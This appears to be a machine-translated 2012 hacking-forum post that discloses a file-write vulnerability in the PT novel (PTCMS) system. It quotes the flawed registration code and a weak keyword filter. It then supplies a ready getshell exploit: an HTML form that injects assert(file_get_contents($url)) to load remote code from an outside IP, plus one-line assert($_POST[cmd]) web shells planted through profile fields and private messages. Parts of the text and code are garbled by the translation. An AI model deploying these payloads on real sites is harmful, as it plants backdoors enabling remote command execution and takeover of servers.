ptcms PT fiction thief PTNovelSteal any code written 0day-vulnerability warning-the black bar safety net

2012-01-22T00:00:00
ID MYHACK58:62201232958
Type myhack58
Reporter 佚名
Modified 2012-01-22T00:00:00

Description

pt the novel system through the kill version. But the official is already out of the patch! (The fucking game!

OK the following text to start:here is our own exchange platform, is part of our 90sec all members of the technical sharing platform!

This sets the program user did not use the database, all user information are saved in/data/user this directory!

Based on the user name to create a folder and write to user registration parameters and user information. 90sec-Web information security team

Somewhere else the code would not look as similar to! So. We only look at one representative:

/user/reg4.php

if (isset($_POST['dosubmit'])){

unset($_POST['dosubmit']);

}else{

echo"<script>alert('route incorrect!'); location. href='reg.php';</script>";

exit();

}

include '../inc/global.php';

include '../data/user.php';

$username=$_POST['username'];

Copy the code

//Write data and information

$str='<? php'."\ n";

foreach($_POST as $key => $value){

$str.="\$ key='$value';\n";

}

$str.="\$ regdate='". date("Y-m-d")."';\ n";

$str.="?& gt;";

$file='../data/user/'.$ username.'/ info.php';

$result=$pt->to write to($file,$str);

Copy the code

...... Omitted

The above code I left only the most critical. Then see our cute foreach in.

The POST value is passed directly to the To write to this function. See the code:

Common.class.php

// Generate the html

function to write to($filePath, $content){

pt::createdir(dirname($filePath));

$pt_html = fopen($filePath, 'w');

flock($pt_html, LOCK_EX);

$result = fwrite($pt_html, $content);

fclose($pt_html);

return $result;

}

//Build directory

function createdir($dir){

if (strpos('\\',$dir)){

$dir=str_replace('\\','/',$dir);

}

$edir = explode("/",$dir);

for($i=0;$i<count($edir);$i++){

$edirm = $edir[0];

for($ii=1;$ii<=$i;$ii++){

$edirm = $edirm.'/'.$ edir[$ii];

}

if(file_exists($edirm) && is_dir($edirm)){

}else{

@mkdir ($edirm,0 7 7 7);

}

}

}

Copy the code

The magic of it, written directly into the php file. OK we see the use of

First, the route judgment can be said to directly disregard. This document is not related to the filter function! We go to call the file see.

Global. php

//Prevent illegal POST

if (! empty($_REQUEST )){

$value=implode(" ",$_REQUEST );

if(preg_match("/\{|\}|fputs|fopen|base64|eval/i", $value)){ // now the patch has been here a keyword. Of course this vulnerability is official and not found to use the bypass!

exit('illegal');

}

}

Copy the code

Not related to the code slightly. You can see the Global inside just a simple filter. Easily bypass it - focused Web information security 9 T, j) X7 L: c9 Q/ S3 w1 l. Q4 g

Using the method to see my EXP!

<title>PT the novel system Getshell Trojan by cfking</title>

<form id="QuickSearch" action="" method="post" name="QuickSearch" onsubmit="addaction();">

Destination address:<input style="width: 4 0 0;" type="text" name="doaction" value="http://localhost/user/reg4.php" />

<input style="width: 4 0 0;" type="hidden" name="dosubmit" value="test" />

Registration account:<input style="width: 4 0 0;" type="text" name="cfking" value="username" />

Remote code:<input style="width: 4 0 0;" type="text" name="url" value="http://110.110.110.110/xx.txt" />

<input style="width: 4 0 0;" type="hidden" name="exp;assert(file_get_contents($url));//" />

<input type="submit" name="QuickSearchBtn" value="submit" style="font-size:16px;"/>

</form>

<script type="text/javascript">

function addaction()

{

document. QuickSearch. action=document. QuickSearch. doaction. value;

}

</script>

<hr><p>tips: the get after the success of the shell path in/data/user/username/info. php I rely on power too much! Roar roar -- you! & lt;p>

Remote code to use the TXT text content fill: eval($_POST[cmd]);

<p><p>

welcome to <a href="http://www.90sec.org/" title="90sec information security team">www.90sec.org</a><hr>

Copy the code

There is a method:

Register for an account after the

Modify personal data in the from where to insert the www. 90sec. org1 i7 }7 G+ @9 Z2 X0 G2 g5 A9 P! p

'?& gt;<? php assert($_POST[cmd]);?& gt;<? php'

the shell path in/data/user/username/info. phpwww. 90sec. org,

But here if the GPC to open a session fails, the following I found another one!

Send a short message, in the title or content write here is our own exchange platform, is part of our 90sec all members of the technical sharing platform!

<? php assert($_POST[cmd]);?& gt;

It can be directly scored

地址 pm.php